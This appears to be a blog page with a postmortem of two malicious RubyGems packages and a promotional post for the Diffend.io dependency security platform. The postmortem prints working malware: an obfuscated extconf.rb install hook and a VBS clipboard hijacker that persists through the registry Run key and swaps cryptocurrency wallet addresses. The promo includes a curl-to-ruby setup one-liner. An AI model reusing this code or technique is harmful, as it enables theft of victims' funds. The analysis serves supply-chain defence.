Running with Ruby

Tag: security (page 1 of 2)

RubyGems Bitcoin Stealing Malware postmortem

Introduction

On the 7th and 13th of December, there were two malicious packages uploaded to RubyGems. Here’s the postmortem and analysis of the packages’ content.

Diffend.io platform that I run closely cooperates with the RubyGems team, providing immediate insights into any gems that have “weird” characteristics. Thanks to that, the gems were yanked relatively fast.

ruby-bitcoin postmortem

On the 7th of December 2020, the ruby-bitcoin package was pinpointed for inspection. On a first glimpse, it seemed legit:

It had a decent amount of “stars” from Github, and there was a Github repository that “looked” like expected. However, all of it was a hoax. This gem was just a shallow copy of the popular bitcoin-ruby library.

Typosquattings of popular gems are no longer allowed on RubyGems, but brandjacking is a an entirely different story. The attacker chose to reverse the -ruby naming and turn it to his advantage. There is no clear convention whether to call things with -ruby postfix or ruby- prefix, and both are allowed and used. There are gems like ruby-kafka as well as bitcoin-ruby. This makes things easier for attackers.

The code that was uploaded used the “not an exploit but a feature” feature of ruby gems, which is the extconf.rb gateway into install code execution. While it is not the only way to do malicious things, it is by far the most common approach due to its simplicity and the fact that an accidental install without requiring or execution is more than enough to infect the machine on which the gem was installed.

The important extconf.rb parts look as followed (removed non-relevant code and re-formatted for better readability):

begin
  os = RbConfig::CONFIG['host_os']

  if os.match(/mswin|msys|mingw|cygwin|bccwin|wince|emc/)
      vbs_out = "RGltIG9ialdTSCxv---...---IA0K"
      content = Base64.decode64(vbs_out.gsub("---", ""))
      File.open("the_Score.vbs", "w") { |file| file.write(content) }
      cmd = "d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz".gsub("---", "")
      decoded_cmd = Base64.decode64(cmd)
      system(decoded_cmd)
  end
rescue => e
end

Full codebase available here.

Upon this gem installation, in case it was Windows OS, a Visual Basic file has been created and executed. The enigmatic "d3Nj---cmlwdCB0---aGVfU2NvcmUud---mJz".gsub("---", "") when decoded is just a Windows Script Host command: wscript the_Score.vbs.

Windows Script Host provides an environment in which users can execute scripts in a variety of languages that use a variety of object models to perform tasks.

What is more interesting, is the Visual Basic script itself:

Dim objWSH,objFSO
Set objWSH = CreateObject("WScript.Shell")
Set objFSO = CreateObject("Scripting.FileSystemObject")
objFSO.DeleteFile(wscript.ScriptFullName)
On Error Resume Next
Dim Fygna, Nfbvm, Sctcr, Zvofm, Fobuo, Rlfad
Fygna = "bc1qgmem0e4mjejg4lpp03tzlmhfpj580wv5hhkf3p"
Nfbvm = "467FN8ns2MRYfLVEuyiMUKisvjz7zYaS9PkJVXVCMSwq37NeesHJpkfG44mxEFHu8Nd9VDtcVy4kM9iVD7so87CAH2iteLg"
Sctcr = "0xcB56f3793cA713813f6f4909D7ad2a6EEe41eF5e"
Zvofm = objWSH.ExpandEnvironmentStrings("%PROGRAMDATA%") & "\Microsoft Essentials"
Fobuo = Zvofm & "\Software Essentials.vbs"
Rlfad = "Microsoft Software Essentials"
If Not objFSO.Folderexists(Zvofm) then
objFSO.CreateFolder Zvofm
End If
Const HKEY_CURRENT_USER = &H80000001
strComputer = "."
Set objRegistry = GetObject("winmgmts:\\" & strComputer & "\root\default:StdRegProv")
objRegistry.SetStringValue HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Run", Rlfad, chr(34) & Fobuo & chr(34)
Call Lncpp()
objWSH.run chr(34) & Fobuo & chr(34)
Set objWSH = Nothing
Set objFSO = Nothing
Sub Lncpp
    Dim Sdrqq
    Set Sdrqq = objFSO.CreateTextFile(Fobuo, True)
    Sdrqq.WriteLine "On Error Resume Next"
    Sdrqq.WriteLine "Set objHTML = CreateObject(" & chr(34) & "HTMLfile" & chr(34) & ")"
    Sdrqq.WriteLine "Set objWSH = CreateObject(" & chr(34) & "WScript.Shell" & chr(34) & ")"
    Sdrqq.WriteLine "Do"
    Sdrqq.WriteLine "wscript.sleep(1000)"
    Sdrqq.WriteLine "Twwzb = objHTML.ParentWindow.ClipboardData.GetData(" & chr(34) & "text" & chr(34) & ")"
    Sdrqq.WriteLine "Vsuvu = Len(Twwzb)"	
    Sdrqq.WriteLine "If Left(Twwzb,1) = " & chr(34) & "1" & chr(34) & " then"
    Sdrqq.WriteLine "If Vsuvu >= 26 and Vsuvu <= 35 then"
    Sdrqq.WriteLine "objWSH.run " & chr(34) & "C:\Windows\System32\cmd.exe /c echo " & Fygna & "| clip" & chr(34) & ", 0"
    Sdrqq.WriteLine "End If"
    Sdrqq.WriteLine "End If"	
    Sdrqq.WriteLine "If Left(Twwzb,1) = " & chr(34) & "3" & chr(34) & " then"
    Sdrqq.WriteLine "If Vsuvu >= 26 and Vsuvu <= 35 then"
    Sdrqq.WriteLine "objWSH.run " & chr(34) & "C:\Windows\System32\cmd.exe /c echo " & Fygna & "| clip" & chr(34) & ", 0"
    Sdrqq.WriteLine "End If"
    Sdrqq.WriteLine "End If"	
    Sdrqq.WriteLine "If Left(Twwzb,1) = " & chr(34) & "4" & chr(34) & " then"
    Sdrqq.WriteLine "If Vsuvu >= 95 and Vsuvu <= 106 then"
    Sdrqq.WriteLine "objWSH.run " & chr(34) & "C:\Windows\System32\cmd.exe /c echo " & Nfbvm & "| clip" & chr(34) & ", 0"
    Sdrqq.WriteLine "End If"
    Sdrqq.WriteLine "End If"
    Sdrqq.WriteLine "If Left(Twwzb,1) = " & chr(34) & "p" & chr(34) & " then"
    Sdrqq.WriteLine "If Vsuvu >= 30 and Vsuvu <= 60 then"
    Sdrqq.WriteLine "objWSH.run " & chr(34) & "C:\Windows\System32\cmd.exe /c echo " & Nfbvm & "| clip" & chr(34) & ", 0"
    Sdrqq.WriteLine "End If"
    Sdrqq.WriteLine "End If"		
    Sdrqq.WriteLine "If Left(Twwzb,1) = " & chr(34) & "0" & chr(34) & " then"
    Sdrqq.WriteLine "If Vsuvu >= 30 and Vsuvu <= 60 then"
    Sdrqq.WriteLine "objWSH.run " & chr(34) & "C:\Windows\System32\cmd.exe /c echo " & Sctcr & "| clip" & chr(34) & ", 0"
    Sdrqq.WriteLine "End If"
    Sdrqq.WriteLine "End If"	
    Sdrqq.WriteLine "Loop"
    Sdrqq.Close
	Set Sdrqq = Nothing
End Sub

This code registers itself to always run on startup and, when invoked, keeps track of the machine clipboard. Whenever a bitcoin wallet ID would be detected, it would be replaced with the attacker’s one.

Did it affect anyone? Hard to say with absolute certainty. The gem was uploaded around 10 pm CET on the 7th of December and was available for around 12 hours. During that time, it got 53 downloads. 50-70 downloads for any new gem is a number indicating, no-one used it. Those downloads are usually triggered by mirroring and analytics platforms based on the webhooks fired by RubyGems. In their case, gems are downloaded but not installed.

pretty_color postmortem

While ruby-bitcoin contained only malicious code, pretty_color actually used a legit codebase from a library called colorize to hide the malicious code.

The malicious code is pretty much the same as in the previous example, however, the execution flow is different. This time it’s not the extconf.rb that triggers the execution but an actual usage attempt:

module TestRuby
  VERSION = "0.1.0"
  class TestVersion
    def self.test
      begin
        # same code as with ruby-bitcoin
      rescue
        p
      end
    end
  end
end

TestRuby::TestVersion.test

I’m certain we can expect more malicious packages that base their names on popular libraries from other package managers.

Summary

I do not underestimate the risks of this type of attack; however, what worries me more are the OSS supply chain attacks designed to cause havoc in the applications in which they are being used. Either by stealing production data, running botnets, or mining coins.

Due to the nature of RubyGems, everyone is allowed to upload anything they want. As long as the packages are not harmful, they are permitted to stay. This means, that research packages like this one, despite collecting and sending data, will not be removed. This makes things a bit harder. There is still some noise from packages that have strong indicators of being malicious while actually not causing any harm.

How to protect yourself against threats like this? That’s a question for a different article, but you can start by being strict whenever you add new dependencies and not relying on new packages. You can also use the free Diffend.io plugin to impose the policies you want to have without any manual interactions.


Cover photo by QuoteInspector.com on Attribution-NoDerivs 2.0 Generic (CC BY-ND 2.0) license.

Diffend – OSS supply chain security and management platform for Ruby

I’m incredibly excited to announce a security platform for managing Ruby gems dependencies: diffend.io.

This platform is a result of my involvement in Ruby security matters for years. It all started in early 2018 with a tool to review gems versions diffs. While working on it, I’ve noticed that there’s much more that needs to be handled. Versions diffing while inevitable, by itself is insufficient, that’s why we’ve built this platform.

Getting started

If you’re just interested in the gems diffing, go to my.diffend.io and select any gem and versions you want to view. New releases for all the gems are computed in real-time, but for some of the older ones, you will have to wait a bit.

You can also use a shiny new link available on each RubyGems gems page to review changes against the previous release of the same gem:

If you would want to run a more thoughtful assessment, you can either run this script in your application main directory:

ruby <(curl -s https://my.diffend.io/api/setup/ruby)

or if you are like me and do not want to run scripts from the internet, you can just follow the super short manual with setup instructions here.

If something is not clear or you have any questions, please contact us at our Slack workspace with this invitation link or drop us a line at contact@diffend.io.

What does it do?

In short, Diffend allows you to:

  1. Review changes in between gems releases before you upgrade based on the gems content itself,
  2. Block attempts of even downloading potentially unwanted gems and their versions,
  3. Manage third party dependencies within your organization,
  4. Ensure OSS licensing consistency in your organization,
  5. Get insights on vulnerabilities, memory leaks and licensing problems of your dependencies,
  6. Make dependency audits a part of your workflow,
  7. Get real-time notifications about any new risks that occur in your production systems (coming soon)

It also runs certain types of heuristics and checks to pinpoint potentially “interesting” releases for further semi-manual inspection.

Why do we need it?

OSS supply chain attacks are becoming a more and more common thing. Looking at RubyGems or npm, there are plenty of examples of packages getting hijacked and malicious versions being uploaded. There were already several attacks that were detected and stopped thanks to Diffend and RubyGems close cooperation.

If you just update dependencies without checking them, you’re not actually sure of what you’re putting into production. You should not trust what’s on Github. An attacker can upload something to a registry without pushing it to Github. The only way to be sure is to look at what’s actually on the registry.

When it’s easy to work securely, people are more likely to do it. diffend.io, is another step towards improving Ruby’s security story by letting you generate diffs from any browser and share them as links. This also lends itself to automation: now you can connect Diffend with your Gemfile and make dependency audits a part of your workflow. We hope this will inspire the community with lots of new security ideas that don’t slow you down.

Is it secure?

Diffend was built with security in mind. Platform, plugin, and our gem collect the absolute minimum amount of data to provide you with the services. Both the Bundler plugin and the monitor will be open-sourced, but even now you can download and review their content.

On top of all of that, we’ve been super cautious about what we collect, that’s why:

  1. We do not collect credentials or environment variables;
  2. We do not execute any remote code from our plugin or gem. Never.
  3. We do not access anything except the Gemfile and Gemfile.lock content.
  4. We do not send to ourselves private access keys for any non-public gems.
  5. We are working on a fully anonymous mode where we do not track public IPs

Support us!

Diffend platform is free to use. You don’t even need an account to review the diffs (and you never will). If you like our platform, please consider convincing your company to support us with any amount of money. We’ll just invoice you for the service usage :)

This way, with a bit of funding, we might be able to push forward many security initiatives much faster.

What’s next?

At the moment we are working on several things:

  • Open-sourcing the plugin and the monitor,
  • Real-time production / staging based context aware Slack and e-mail notifications about new risks,
  • Improved heuristics and detection capabilities,
  • Modified Ruby VM for network tracking analysis with pre-execution permissions,
  • Ruby process behaviour tracking,
  • Open-sourcing several of the components for self-service,
  • Fully anonymous mode without collecting any public data.

Diffend is a platform in an alpha stage and under massive development. Some functionalities may not work on every operating system, and some other features may not be available or may be broken. We are working hard to fix and improve the platform, which is why we are counting on your feedback so that we can meet your exact needs faster!

Read more

Olderposts

Copyright © 2021 Running with Ruby

Theme by Anders NorenUp ↑